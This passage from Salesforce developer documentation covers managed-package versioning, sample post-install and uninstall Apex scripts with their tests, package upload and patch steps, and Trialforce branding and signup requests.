chosen value during every non-patch release. Major and minor number increases will always use a patch number of 0.

The following are instance methods for the System.Version class.

DescriptionReturn TypeArgumentsMethod

Compares the current version with the
specified version and returns one of the
following values:

IntegerSystem.Version versioncompareTo

• Zero if the current package version is
equal to the specified package version

• An Integer value greater than zero if the
current package version is greater than
the specified package version

• An Integer value less than zero if the
current package version is less than the
specified package version

If a two-part version is being compared to
a three-part version, the patch number is
ignored and the comparison is based only
on the major and minor numbers.

Returns the major package version of the
calling code.

Integermajor

Returns the minor package version of the
calling code.

Integerminor

Returns the patch package version of the
calling code or null if there is no patch
version.

Integerpatch

The System class contains two methods that you can use to specify conditional logic, so different package versions exhibit
different behavior.

• System.requestVersion: Returns a two-part version that contains the major and minor version numbers of a package.
Using this method, you can determine the version of an installed instance of your package from which the calling code is
referencing your package. Based on the version that the calling code has, you can customize the behavior of your package
code.

• System.runAs(System.Version): Changes the current package version to the package version specified in the
argument.

When a subscriber has installed multiple versions of your package and writes code that references Apex classes or triggers in
your package, they must select the version they are referencing. You can execute different code paths in your package’s Apex
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code based on the version setting of the calling Apex code making the reference. You can determine the calling code’s package
version setting by calling the System.requestVersion method in the package code.

See Also:
Running Apex on Package Install/Upgrade
Version Methods Sample in the Force.com Apex Code Developer's Guide

Example of a Post Install Script
The following sample post install script performs these actions on package install/upgrade.

• If the previous version is null, that is, the package is being installed for the first time, the script:

◊ Creates a new Account called “Newco” and verifies that it was created.

◊ Creates a new instance of the custom object Survey, called “Client Satisfaction Survey”.

◊ Sends an email message to the subscriber confirming installation of the package.

• If the previous version is 1.0, the script creates a new instance of Survey called “Upgrading from Version 1.0”.

• If the package is an upgrade, the script creates a new instance of Survey called “Sample Survey during Upgrade”.

• If the upgrade is being pushed, the script creates a new instance of Survey called “Sample Survey during Push”.

global class PostInstallClass implements InstallHandler {
global void onInstall(InstallContext context) {
if(context.previousVersion() == null) {
Account a = new Account(name='Newco');
insert(a);

Survey__c obj = new Survey__c(name='Client Satisfaction Survey');
insert obj;

User u = [Select Id, Email from User where Id =:context.installerID()];
String toAddress= u.Email;
String[] toAddresses = new String[]{toAddress};
Messaging.SingleEmailMessage mail =
new Messaging.SingleEmailMessage();

mail.setToAddresses(toAddresses);
mail.setReplyTo('support@package.dev');
mail.setSenderDisplayName('My Package Support');
mail.setSubject('Package install successful');
mail.setPlainTextBody('Thanks for installing the package.');
Messaging.sendEmail(new Messaging.Email[] { mail });
}

else
if(context.previousVersion().compareTo(new Version(1,0)) == 0) {
Survey__c obj = new Survey__c(name='Upgrading from Version 1.0');
insert(obj);
}

if(context.isUpgrade()) {
Survey__c obj = new Survey__c(name='Sample Survey during Upgrade');
insert obj;
}

if(context.isPush()) {
Survey__c obj = new Survey__c(name='Sample Survey during Push');
insert obj;
}
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}
}

You can test a post install script using the new testInstall method of the Test class. This method takes the following
arguments.

• A class that implements the InstallHandler interface.

• A Version object that specifies the version number of the existing package.

• An optional Boolean value that is true if the installation is a push. The default is false.

This sample shows how to test a post install script implemented in the PostInstallClass Apex class.

@isTest
static void testInstallScript() {
PostInstallClass postinstall = new PostInstallClass();
Test.testInstall(postinstall, null);
Test.testInstall(postinstall, new Version(1,0), true);
List<Account> a = [Select id, name from Account where name ='Newco'];
System.assertEquals(a.size(), 1, 'Account not found');

}

See Also:
Running Apex on Package Install/Upgrade

Specifying a Post Install Script
Once you have created and tested the post install script, you can specify it in the Post Install Script lookup field on the Package
Detail page. In subsequent patch releases, you can change the contents of the script but not the Apex class.

The class selection is also available via the Metadata API as Package.postInstallClass. This is represented in package.xml
as a <postInstallClass>foo</postInstallClass> element.

See Also:
Running Apex on Package Install/Upgrade

Running Apex on Package Uninstall
App developers can specify an Apex script to run automatically after a subscriber uninstalls a managed package. This makes
it possible to perform cleanup and notification tasks based on details of the subscriber’s organization. For simplicity, you can
only specify one uninstall script. It must be an Apex class that is a member of the package.

The uninstall script is subject to default governor limits. It runs as a special system user that represents your package, so all
operations performed by the script will appear to be done by your package. You can access this user by using UserInfo. You
will only see this user at runtime, not while running tests.

If the script fails, the uninstall continues but none of the changes performed by the script are committed. Any errors in the
script are emailed to the user specified in the Notify on Apex Error field of the package. If no user is specified, the uninstall
details will be unavailable.
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The uninstall script has the following restrictions. You can’t use it to initiate batch, scheduled, and future jobs, to access Session
IDs, or to perform callouts.

See Also:
How does an Uninstall Script Work?
Example of an Uninstall Script
Specifying an Uninstall Script

How does an Uninstall Script Work?
An uninstall script is an Apex class that implements the UninstallHandler interface. This interface has a single method
called onUninstall that specifies the actions to be performed on uninstall.

global interface UninstallHandler {
void onUninstall(UninstallContext context)

}

The onUninstall method takes a context object as its argument, which provides the following information.

• The org ID of the organization in which the uninstall takes place.

• The user ID of the user who initiated the uninstall.

The context argument is an object whose type is the UninstallContext interface. This interface is automatically implemented
by the system. The following definition of the UninstallContext interface shows the methods you can call on the context
argument.

global interface UninstallContext {
ID organizationId();
ID uninstallerId();

}

See Also:
Running Apex on Package Uninstall

Example of an Uninstall Script
The sample uninstall script below performs the following actions on package uninstall. 

• Inserts an entry in the feed describing which user did the uninstall and in which organization

• Creates and sends an email message confirming the uninstall to that user

global class UninstallClass implements UninstallHandler {
global void onUninstall(UninstallContext ctx) {
FeedItem feedPost = new FeedItem();
feedPost.parentId = ctx.uninstallerID();
feedPost.body = 'Thank you for using our application!';
insert feedPost;

3859

Running Apex on Package UninstallWorking with Packages



User u = [Select Id, Email from User where Id =:ctx.uninstallerID()];
String toAddress= u.Email;
String[] toAddresses = new String[] {toAddress};
Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
mail.setToAddresses(toAddresses);
mail.setReplyTo('support@package.dev');
mail.setSenderDisplayName('My Package Support');
mail.setSubject('Package uninstall successful');
mail.setPlainTextBody('Thanks for uninstalling the package.');
Messaging.sendEmail(new Messaging.Email[] { mail });

}
}

You can test an uninstall script using the testUninstall method of the Test class. This method takes as its argument a
class that implements the UninstallHandler interface.

This sample shows how to test an uninstall script implemented in the UninstallClass Apex class.

@isTest
static void testUninstallScript() {
Id UninstallerId = UserInfo.getUserId();
List<FeedItem> feedPostsBefore =
[SELECT Id FROM FeedItem WHERE parentId=:UninstallerId AND CreatedDate=TODAY];

Test.testUninstall(new UninstallClass());
List<FeedItem> feedPostsAfter =
[SELECT Id FROM FeedItem WHERE parentId=:UninstallerId AND CreatedDate=TODAY];

System.assertEquals(feedPostsBefore.size() + 1, feedPostsAfter.size(),
'Post to uninstaller failed.');

}

See Also:
Running Apex on Package Uninstall

Specifying an Uninstall Script
Once you have created and tested the uninstall script and included it as a member of your package, you can specify it in the
Uninstall Script lookup field on the Package Detail page. In subsequent patch releases, you can change the contents of the
script but not the Apex class.

The class selection is also available via the Metadata API as Package.uninstallClass. This is represented in package.xml
as an <uninstallClass>foo</uninstallClass> element.

See Also:
Running Apex on Package Uninstall
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Developing App Documentation
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To edit custom tabs:

Salesforce recommends publishing your app on AppExchange with the following types of documentation:

Configure Option

You can include a Configure option for installers. This option can link to installation and configuration details, such
as:
• Provisioning the external service of a composite app

• Custom app settings

The Configure option is included in your package as a custom link. You can create a custom link for your home page
layouts and add it to your package.

1. Create a custom link to a URL that contains configuration information or a Visualforce page that implements
configuration. When you create your custom link, set the display properties to Open in separate popup window
so that the user returns to the same Salesforce page when done.

2. When you create the package, choose this custom link in the Configure Custom Link field of your package
detail.

Data Sheet

Give installers the fundamental information they need to know about your app before they install.

Customization and Enhancement Guide

Let installers know what they must customize after installation as part of their implementation.

Custom Help

You can provide custom help for your custom object records and custom fields.

Tip: To give your custom help a professional tone using Salesforce terminology, follow the Salesforce.com Style
Guide for Documentation and User Interface Text. To use the Salesforce styles, use Visualforce to design your
pages.

See Also:
Overview of Packages
Assigning Force.com AppExchange Publishers
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Assigning Force.com AppExchange Publishers
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To assign permissions:

Users that publish packages on Force.com AppExchange must have the following user permissions:

Create Force.com AppExchange packages

Allows a user to create packages and add components to it.

Upload Force.com AppExchange Packages

Allows a user to upload and register or publish packages to Force.com AppExchange.

The System Administrator profile automatically has both these permissions. Determine which of your users should have these
permissions and add them to the appropriate user profiles or permission sets.

See Also:
Overview of Packages
Developing App Documentation

Converting Unmanaged Packages to Managed
Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure developer settings:

“Create AppExchange Packages”To create packages:

“Upload AppExchange Packages”To upload packages:

Your organization may already have uploaded and registered packages on Force.com AppExchange directory. All packages
uploaded prior to the Winter '07 release are unmanaged, meaning they cannot be upgraded in the installer's organization. You
can convert them to managed packages by configuring your organization for managed packages and choosing a package to be
managed. This allows you to notify installers when an upgrade is ready for them to install.

Before you convert an existing package to managed, notify your current installers of how to save their data:
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1. Export all the data from the previous, unmanaged version of the package.
2. Uninstall the unmanaged package.
3. Install the new managed version of the package.
4. Import all the exported data into the new managed package.

Note:  Note to installers: if you have made customizations to an installation of an unmanaged package, make a
list of these customizations before uninstalling since you may want to implement them again. However, some
customizations will not be possible with a managed package. See the Force.com Quick Reference for Developing
Packages.

To convert an unmanaged package into a managed package:

1. Enable managed packages for your organization.
2. From Setup, click Create > Packages, edit the package you want to make managed, and select Managed.

Warning:  Converting an unmanaged package to managed requires registering a namespace prefix that affects the
API names of uniquely named package components such as custom fields or s-controls. S-controls stored in the
s-control library or the Documents tab that do not use the Force.com API still function properly after you register a
namespace prefix. However, s-controls stored outside of your organization or s-controls that use the Force.com API
to call Salesforce may require some fine-tuning. For more information, see S-control in the Object Reference.

See Also:
Managing Packages
Creating Managed Packages

DISTRIBUTING YOUR APPS

Preparing Your Apps for Distribution
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To create packages:

“Upload AppExchange Packages”To upload packages:

When you are ready to distribute your package, determine if you want to release a managed or unmanaged package. For more
information about the different types of releases, see Developing Packages for Distribution.

1. Create a package:
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From Setup, click Create > Packages.a.
b. Click New.
c. Enter a name for your package. This does not have to be the same name that appears on AppExchange.
d. From the drop-down menu, select the default language of all component labels in the package.
e. Optionally, choose a custom link from the Configure Custom Link field to display configuration information to

installers of your app. You can select a predefined custom link to a URL or s-control that you have created for your
home page layouts; see the Configure Option on page 3861. The custom link displays as a Configure link within Salesforce
on the Force.com AppExchange Downloads page and app detail page of the installer's organization.

f. Optionally, in the Notify on Apex Error field, enter the username of the person who should receive an email
notification if an exception occurs in Apex that is not caught by the Apex code. If you do not specify a username, all
uncaught exceptions generate an email notification that is sent to salesforce.com. This is only available for managed
packages. For more information, see Handling Apex Exceptions in Managed Packages on page 3579.

Note: Apex can only be packaged from Developer, Enterprise, and Unlimited Edition organizations.

g. Optionally, enter a description that describes the package. You will have a chance to change this description before you
upload it to AppExchange.

h. Optionally, specify a post install script. This is an Apex script that runs in the subscriber organization after the package
is installed or upgraded. For more information, see Running Apex on Package Install/Upgrade.

i. Optionally, specify an uninstall script. This is an Apex script that runs in the subscriber organization after the package
is uninstalled. For more information, see Running Apex on Package Uninstall.

j. Click Save.

2. Salesforce sets your package API access privileges to Unrestricted. You can change this setting to further restrict API
access of Salesforce components in the package. For more information, see Managing API and Dynamic Apex Access in
Packages on page 3843.

3. Add the necessary components for your app.

a. Click Add.
b. From the drop-down list, choose the type of component you want to add to your package.

• At the top of the list, click a letter to display the contents of the sorted column that begin with that character.
• If available, click the Next Page (or Previous Page) link to go to the next or previous set of components.
• If available, click fewer or more at the bottom of the list to view a shorter or longer display list.

c. Select the components you want to add.

Note:  Some components cannot be added to Managed - Released packages. For a list of these components,
see Developing Packages for Distribution.

S-controls cannot be added to packages with restricted API access.

d. Click Add To Package.

Repeat these steps until you have added all the components you want in your package.

Note:

• Some related components are automatically included in the package even though they may not display in the
Package Components list. For example, when you add a custom object to a package, its custom fields, page
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layouts, and relationships with standard objects are automatically included. For a complete list of components
Salesforce automatically includes, see Developing Packages for Distribution.

• When you package a joined report, each block is included in the package. Although the blocks appear in the
package as reports, when you click on a block, you see an error message that you have “insufficient privileges”
to view the report. This is expected behavior. Instead, click on the name of the joined report to run it.

4. Optionally, click View Dependencies and review a list of components that rely on other components, permissions, or
preferences within the package. An entity may include such things as an s-control, a standard or custom field, or an
organization-wide setting like multicurrency. Your package cannot be installed unless the installer has the listed components
enabled or installed. For more information on dependencies, see Understanding Dependencies on page 3846. Click Done
to return to the Package detail page.

Note:  You cannot upload packages that contain any of the following:

• References to person accounts, such as an s-control or custom field referencing person accounts.
• Workflow rules or workflow actions (such as field updates or outbound messages) that reference record types.
• Reports that reference record types on standard objects.

5. Click Upload.

Note:  If you are creating a managed package to publish on AppExchange, you must certify your application before
you package it. For more information, see Security and Trust on AppExchange.

On the Upload Package page, do the following:

a. Enter a Version Name. As a best practice, it's useful to have a short description and the date.
b. Enter a Version Number for the upload, such as 1.0. The format is majorNumber.minorNumber.

Note:

If you are uploading a new patch version, you can't change the patch number.

The version number represents a release of a package. This field is required for managed and unmanaged packages.
For a managed package, the version number corresponds to a Managed - Released upload. All beta uploads use the
same version number until you upload a Managed - Released package version with a new version number. For example,
the following is a sequence of version numbers for a series of uploads.

NotesVersion
Number

TypeUpload
Sequence

The first Managed - Beta upload.1.0Managed - BetaFirst upload

A Managed - Released upload. Note that the version number
does not change.

1.0Managed - ReleasedSecond
upload

Note the change of minor release number for this Managed
- Released upload.

1.1Managed - ReleasedThird upload

The first Managed - Beta upload for version number 2.0.
Note the major version number update.

2.0Managed - BetaFourth upload
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NotesVersion
Number

TypeUpload
Sequence

A Managed - Released upload. Note that the version number
does not change.

2.0Managed - ReleasedFifth upload

c. For managed packages, select a Release Type:

• Choose Managed - Released to upload an upgradeable version. After upload, some attributes of Salesforce components
are locked. For a list of locked attributes, see Developing Packages for Distribution.

• Choose Managed - Beta if you want to upload a version of your package to a small sampling of your audience for
testing purposes. You'll still be able to change the components and upload additional beta versions. For information
on beta versions, see Developing Packages for Distribution.

Note:  Beta packages can only be installed in Developer Edition or sandbox organizations, and thus can't
be pushed to customer organizations.

d. Change the Description, if necessary.
e. Optionally, enter and confirm a password to share the package privately with anyone who has the password. Don't

enter a password if you want to make the package available to anyone on AppExchange and share your package publicly.
f. Salesforce automatically selects the requirements it finds. In addition, select any other required components from the

Package Requirements and Object Requirements sections to notify installers of any requirements for this
package.

g. Click Upload.

6. Once your upload is complete you can do any of the following.

• Click Change Password link to change the password option.
• Click Deprecate to prevent new installations of this package while allowing existing installations to continue operating.

Note:  You cannot deprecate the most recent version of a managed package.

When you deprecate a package, remember to remove it from AppExchange as well. See “Removing Apps from
AppExchange” in the AppExchange online help.

• Click Undeprecate to make a deprecated version available for installation again.

You will receive an email that includes an installation link when your package has been uploaded successfully.
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Note:  If you uploaded from your Salesforce production organization, notify installers who want to install it in a
sandbox organization to replace the “login.salesforce.com” portion of the installation link with “test.salesforce.com.”

See Also:
Overview of Packages
Managing Packages
Understanding Dependencies
Managing Versions
Creating and Uploading Patches
Publishing Upgrades to Managed Packages
Publishing Extensions to Managed Packages

Why Use Trialforce?
Trialforce provides a simple way to provision free trials and deploy your Force.com app from your own website, or any other
site. Using Trialforce you can:

• Run your own marketing campaigns to maximize customer reach and adoption.

• Customize your app, including branding, functionality, design, data, and trial experience.

• Manage trials for multiple apps, versions, and editions from one convenient place.

• Let customers, such as non-admin users, who can’t install your app spin up a trial of your app in a new organization.

In addition to provisioning a trial instance of your application for each new subscriber, Salesforce also deposits a lead into your
License Management Organization.

See Also:
Setting up Custom Branding for Trialforce
Trialforce Source Organizations
New Trialforce Source Organization
Edit Trialforce Source Organization
Trialforce

3867

Why Use Trialforce?Distributing Your Apps



Setting up Custom Branding for Trialforce

Available in: Developer Edition

User Permissions Needed

“Customize Application”To manage Trialforce:

App developers using Trialforce to create new trials of their product can optionally set up a branded login site and system
emails. By branding these areas with your company's look and feel, users of your application will be immersed in your brand
from sign-up to login. Custom branding should only be used for non-CRM apps, not for for apps that extend Salesforce CRM
and require Salesforce standard objects such as Leads, Opportunities, and Cases.

A branded login page enables you to specify your login domain and login site.

• Login domains end with .cloudforce.com, so that if your company name is “mycompany,” then your login domain
will be mycompany.cloudforce.com.

• Your custom login site includes your text and company logo, and mobile-friendly versions of your login site as well.

Branded emails allow you to specify fields in system-generated emails so that your company name, address, and other pertinent
details are used in email correspondence. You can create multiple branded email sets for different campaigns or customer
segments.

Note:  To configure branding, you must be logged into a Trialforce Management Organization (TMO). To get your
TMO, log a case in the Salesforce Partner Portal.

See Also:
Why Use Trialforce?
Trialforce Branded Login Site
Trialforce Branded Email Sets

Trialforce Branded Login Site

Available in: Developer Edition

User Permissions Needed

“Package Branding”To define package branding:

Use the Trialforce Branded Login Site page to create, publish, and edit a login page that has your company's look and feel.

• If you haven't set up a login site yet, click Set Up Login Site.
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• If you've already set up a login site, click Publish to make the site available, or Launch Site Editor to make changes.

See Also:
Setting up Custom Branding for Trialforce
Trialforce Login Site Domain
Creating a Branded Login Page
Trialforce Login Branding Editor

Trialforce Login Site Domain

Choose a subdomain where customers will log into your application. Usually the subdomain is the name of your company.

1. In the field provided, enter a name.
2. Click Check Availability.
3. Accept the terms of use.
4. Click Save and Launch Editor.

See Also:
Trialforce Branded Login Site

Creating a Branded Login Page

Available in: Developer Edition

User Permissions Needed

“Customize Application”To manage Trialforce:

Customers typically log into your app using the traditional login.salesforce.com site. A branded login page enables you to
customize this domain and parts of this login page so you can provide a branded experience for your customers. Your custom
login site includes your text and company logo, and mobile-friendly versions of your login site as well.

To create a branded login page:

1. Log into your Trialforce Management Organization.
2. From Setup, click Trialforce > Branding > Login Site.
3. Click Set Up Login Site.
4. Select a subdomain for your login site by providing a name in the field provided. Usually this is the name of your company.

Note: Login domains end with .cloudforce.com, so that if your company name is “mycompany,” then your
login domain will be mycompany.cloudforce.com.

5. Check the availability of the domain and then accept the terms of use.
6. Click Save and Launch Editor.
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7. Use the Login Brand Editor to change how your login page looks. For additional help using the editor, click Help for this
Page.

8. Click Save and Close.
9. If you're ready to make these changes available to your TSO, click Publish. Otherwise your changes are saved and you can

publish later.

See Also:
Trialforce Branded Login Site

Trialforce Login Branding Editor

Available in: Developer Edition

User Permissions Needed

“Customize Application”To manage Trialforce:

Use the Branded Login Site Editor to design your login pages.

1. At the top of the editor, click the tab for the login page size: Desktop or Mobile.
2. In the left pane, expand the Page Header node and click Select File to choose your company logo for each size screen your

app supports.
3. In the Logo Link > Use custom link field, optionally, enter a web address to be used when a customer clicks your logo,

such as your corporate website. The URL must start with http:// or https://. If you leave this field blank, your logo
will not have a link.

4. Expand Page Content node and paste in the trial sign-up link URL from your Trialforce Templates page into the Trial
Sign-Up Link > Use custom link field.

5. Provide URLs for the right and bottom of the page. If you leave these fields blank, the frames default to the ones used on
the Salesforce login page.

6. Expand the page footer and provide your company name and font color.
7. Expand the page background node and provide a background image and color.
8. At the top of the page click Save and Close.
9. On the Branded Login Site page, click Preview for the size of the page you want to see. Make sure your login page appears

correct for each login page your app supports.

See Also:
Trialforce Branded Login Site
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Trialforce Branded Email Sets

Available in: Developer Edition

User Permissions Needed

“Package Branding”To define package branding:

Trialforce Email Branding allows you to modify system-generated emails so that they appear to come from your company
rather than from Salesforce.com. Trialforce Email Branding only applies to users who sign up for your application through
Trialforce.

Each Trialforce source organization comes with a standard set of email notifications that are sent to customers. For example,
customers get an email notification when they first sign up, or when they reset their password. You don't have to rewrite all
of these system-generated emails yourself. Just provide the values for the fields and the system takes care of the rest.

See Also:
Setting up Custom Branding for Trialforce
Edit Trialforce Branded Email Set

Edit Trialforce Branded Email Set

To begin, click New Email Set or Edit next to an existing email set.

1. Fill in the fields with your company info.
2. In the Preview Emails area, click through the different types of generated emails and make sure they read correctly.
3. Click Save.
4. If you're ready to make these emails available to your Trialforce source organizations, click Publish. Otherwise your changes

are saved and you can publish later.

See Also:
Trialforce Branded Email Sets

Trialforce Source Organizations

Available in: Developer Edition

The Trialforce Source Organizations page helps you create and manage your Trialforce source organizations.

• To create a new source organization, click New .
• If you have an existing source organization you want to use, click Login.
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• To edit an existing source organization, click Edit.

See Also:
Why Use Trialforce?

New Trialforce Source Organization

Available in: Developer Edition

User Permissions Needed

“Package Branding”To define package branding:

To create a new source organization:

1. Enter a new username and email address for the administrator account.
2. Enter the source organization name and select the branding.
3. Click Create.

See Also:
Why Use Trialforce?

Edit Trialforce Source Organization

Available in: Developer Edition

User Permissions Needed

“Package Branding”To define package branding:

To edit a Trialforce source organization:

1. Enter the source organization name and select the branding.
2. Click Save.

See Also:
Why Use Trialforce?
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Trialforce

Available in: Developer Edition

User Permissions Needed

“Package Branding”To define package branding:

To create a Trialforce template:

1. Click New Trialforce Template.
2. Specify a description of the template and whether to include data in the dialog that appears.
3. Click Save.

You’ll receive an email with the organization ID of the new template, once it’s generated. You can use the ID to sign up trial
organizations. Remember to generate a new template every time you make updates to your TSO, so your trials always reflect
the most recent state.

Note:  You can only create a Trialforce template if your Trialforce Source Organization is less than 256 MB in size.

Each Trialforce template has a status with one of the following values.

In Progress

When a Trialforce template is first created, it always has this status. It then automatically moves to either Success or
Error status.

Success

The Trialforce template can be used to create new trial organizations.

Error

The Trialforce template cannot be used as something has gone wrong and additional debugging is required.

Deleted

The Trialforce template is no longer available for use. Deleted templates are automatically removed during system
updates.

See Also:
Why Use Trialforce?

3873

Why Use Trialforce?Distributing Your Apps



Creating Signups using the API
User Permissions Needed

“Signup Request API”To create or view signup requests:

You can use API calls to the SignupRequest object to create trial organizations for prospective customers. When creating trial
organizations (or signups) using a web form, there’s no way to customize the signup process or track its status. Using the API,
you can collect and analyze detailed information on all signups from your business organization. This gives you more control
over the signup process, and enhanced visibility into your prospective customers. For example, you can:

• Run reports and collect metrics, such as the number of signups per day or the number of signups in different countries.

• Customize the SignupRequest object to add fields of special interest to your company.

• Create triggers to initiate specific actions, such as sending an email notification, whenever a new signup request is made.

• Enable signups from a wide range of client applications and devices, so you have additional channels for customer acquisition.

Note:  Although you can create new signups from any organization (with the appropriate permissions), we recommend
doing so from your business organization. You can then easily integrate data and metrics on all signups with your
existing business processes.

To start creating new signups using the API:

1. Create a Trialforce Source Organization (TSO) from your Trialforce Management Organization.
2. Install your app in the TSO, along with any sample data that might be useful for the trial.
3. Configure the TSO as you want your customers to experience it, including specifying any custom branding.
4. Create a Trialforce template from the TSO.
5. File a case in the Partner Portal, specifying the Organization ID of your TSO and the template ID of the Trialforce

template.

You’ll be notified by email once the template is approved. It can then be used to create new signups by making API calls to
the SignupRequest object. See below for details of the SignupRequest object and a code sample demonstrating its use.

Note:  For more information on working with objects, see the Object Reference for Salesforce and Force.com.

See Also:
Signup Request Home
Creating a Signup Request
Viewing Signup Request Details
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Signup Request Home

User Permissions Needed

“Signup Request API”To create or view signup requests:

Clicking the Signup Requests tab displays the signup requests home page. In the Recent Signup Requests section:

• Click New to create a new signup.

• Click the number of any signup request to see details about it, including its history and approval status.

• Select an item from the drop-down list to display a list of the signup requests matching that criterion. From the list, you
can click any signup request name to go directly to the signup request detail.

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

Note:  You must get your Trialforce template approved, by filing a case in the Partner Portal, before you can create
new signups from this page.

See Also:
Creating Signups using the API

Creating a Signup Request

User Permissions Needed

“Signup Request API”To create or view signup requests:

1. Select Signup Request from the Create New drop-down list in the sidebar, or click New next to Recent Signup Requests
on the signup requests home page.

2. Enter the information for the signup request.
3. Click Save when you’re finished, or click Save & New to save the current signup request and add another.

See Also:
Creating Signups using the API
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Viewing Signup Request Details

User Permissions Needed

“Signup Request API”To create or view signup requests:

From the Signup Request detail page:

• Click Delete to delete the signup request

• Click Clone to create a new signup request with the same attributes as this one

The detail page has the following sections.

• Signup Request Detail

• Signup Request History

Signup Request Detail

This section displays the following attributes (in alphabetical order).

DescriptionAttribute

The name of the company requesting the trial signup.Company

The two=character, upper-case ISO-3166 country code. You can find a full list of these codes
at a number of sites, such as:
www.iso.ch/iso/en/prods-services/iso3166ma/02iso-3166-code-lists/list-en1.html

Country

The 15–character Organization ID of the trial organization created. This is a read-only field
provided by the system once the signup request has been processed.

Created Org

The email address of the admin user for the trial signup.Email

The error code if the signup request isn’t successful. This is a read-only field provided by the
system to be used for support purposes.

Error Code

The first name of the admin user for the trial signup.First Name

The last name of the admin user for the trial signup.Last Name

The 15–character Organization ID of the Trialforce Source Organization from which the
Trialforce template was created.

Source Org

The status of the request. Possible values are New, In Progress, Error, or Success. The
default value is New.

Status

The 15–character ID of the approved Trialforce template that is the basis for the trial signup.
The template is required and must be approved by salesforce.com.

Template

The description of the approved Trialforce template that is the basis for the trial signup.Template Description

The duration of the trial signup in days. Must be equal to or less than the trial days for the
approved Trialforce template. If not provided, it defaults to the trial duration specified for
the Trialforce template.

Trial Days
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DescriptionAttribute

The username of the admin user for the trial signup. It must follow the address convention
specified in RFC822: www.w3.org/Protocols/rfc822/#z10

Username

Signup Request History

This section shows the date the signup request was created, the user who created it, and the actions that have been performed
on it.

See Also:
Creating Signups using the API

Publishing Extensions to Managed Packages
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create AppExchange Packages”To create packages:

“Upload AppExchange Packages”To upload packages:

An extension is any package, component, or set of components that adds to the functionality of a managed package. An
extension requires that the base managed package be installed in the organization. For example, if you have built a recruiting
app, an extension to this app might include a component for performing background checks on candidates.

The community of developers, users, and visionaries building and publishing apps on Force.com AppExchange is part of what
makes Force.com such a rich development platform. Use this community to build extensions to other apps and encourage
them to build extensions to your apps.

To publish extensions to a managed package:

1. Install the base package in the Salesforce organization that you plan to use to upload the extension.
2. Build your extension components.

Note:  To build an extension, install the base package and include a dependency to that base package in your
package. The extension attribute will automatically become active.

3. Create a new package and add your extension components. Salesforce automatically includes some related components.
For more information, see the Force.com Quick Reference for Developing Packages.

4. Upload the new package that contains the extension components.
5. Proceed with the publishing process as usual. For information on creating a test drive or registering and publishing your

app, go to http://sites.force.com/appexchange/publisherHome.
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Note:  Packages cannot be upgraded to Managed - Beta if they are used within the same organization as an extension.

See Also:
Preparing Your Apps for Distribution
Understanding Dependencies
Managing Versions
Publishing Upgrades to Managed Packages

Publishing Upgrades to Managed Packages
Available in: Developer Edition

Package uploads and installs are available in Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To configure developer settings:

“Create AppExchange Packages”To create packages:

“Upload AppExchange Packages”To upload packages:

As a publisher, first ensure that your app is upgradeable by converting it to a managed package. Any changes you make to the
components in a managed package are automatically included in subsequent uploads of that package, with one exception.
When you upgrade a package, changes to the API access are ignored even if the developer specified them. This ensures that
the administrator installing the upgrade has full control. Installers should carefully examine the changes in package access in
each upgrade during installation and note all acceptable changes. Then, because those changes are ignored, the administrator
should manually apply any acceptable changes after installing an upgrade. For more information, see About API and Dynamic
Apex Access in Packages on page 3841.

To publish upgrades to a managed package:

1. From Setup, click Create > Packages, and select the package from the list of packages available.
2. View the list of package components. Changes you have made to components in this package are automatically included

in this list. If the changes reference additional components, those components are automatically included as well. To add
new components, click Add to add them to the package manually.

3. Click Upload and upload it as usual.

Note:

After you upload a new version of your Managed - Released package, you can click Deprecate so installers cannot
install an older version. Deprecation prevents new installations of older versions without affecting existing
installations. For more information, see Managing Versions on page 3879.

You cannot deprecate the most recent version of a managed package upload.
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4. When you receive an email with the link to the upload on Force.com AppExchange, notify your installed users that the
new version is ready. Use the list of installed users from the License Management Application (LMA) to distribute this
information. The License Management Application (LMA) automatically stores the version number that your installers
have in their organizations.

See Also:
Preparing Your Apps for Distribution
Understanding Dependencies
Managing Versions
Creating and Uploading Patches
Publishing Extensions to Managed Packages

Managing Versions
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Upload AppExchange Packages”To upload packages:

After you upload a package to Force.com AppExchange, you can still manage it from Salesforce. To manage your versions:

1. From Setup, click Create > Packages.
2. Select the package that contains the app or components you uploaded.
3. Select the version number listed in the Versions tab.

• Click Change Password link to change the password option.
• Click Deprecate to prevent new installations of this package while allowing existing installations to continue operating.

Note:  You cannot deprecate the most recent version of a managed package.

When you deprecate a package, remember to remove it from AppExchange as well. See “Removing Apps from
AppExchange” in the AppExchange online help.

• Click Undeprecate to make a deprecated version available for installation again.
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Note: To create a test drive or choose a License Management Organization (LMO) for what you have uploaded,
click Proceed to AppExchange from the package upload detail page.

See Also:
Preparing Your Apps for Distribution
Understanding Dependencies
Creating and Uploading Patches
Publishing Upgrades to Managed Packages
Publishing Extensions to Managed Packages
Security Tips for Apex and Visualforce Development

Creating and Uploading Patches
Available in: Developer Edition

User Permissions Needed

“Upload AppExchange Packages”To push an upgrade or create a patch development
organization:

Note:  Patch versions and push upgrades are only available to Salesforce ISV partners.

Patch versions are developed and maintained in a patch development organization. For more information on push upgrades
and patches, see the Force.com Quick Reference for Developing Packages. You can also read the Best Practices for Push
Upgrades and Patch Versions on page 3887.

To create a patch version:

1. From Setup, click Create > Packages.
2. Click the name of your managed package.
3. Click the Patch Organization tab and then click New.
4. Select the package version that you want to create a patch for in the Patching Major Release drop-down list. The release

type must be Managed - Released.
5. Enter a Username for a login to your patch organization.
6. Enter an Email Address associated with your login.
7. Click Save.

Note:  If you ever lose your login information, click Reset on the package detail page under Patch Development
Organizations to reset the login to your patch development organization.

3880

Creating and Uploading PatchesDistributing Your Apps

http://sites.force.com/partners/PP2Page?p=P_PartnerPrograms
http://na1.salesforce.com/help/doc/en/salesforce_packaging_guide.pdf


After you receive an email indicating Salesforce has created your patch development organization, you can click Login to begin
developing your patch version.

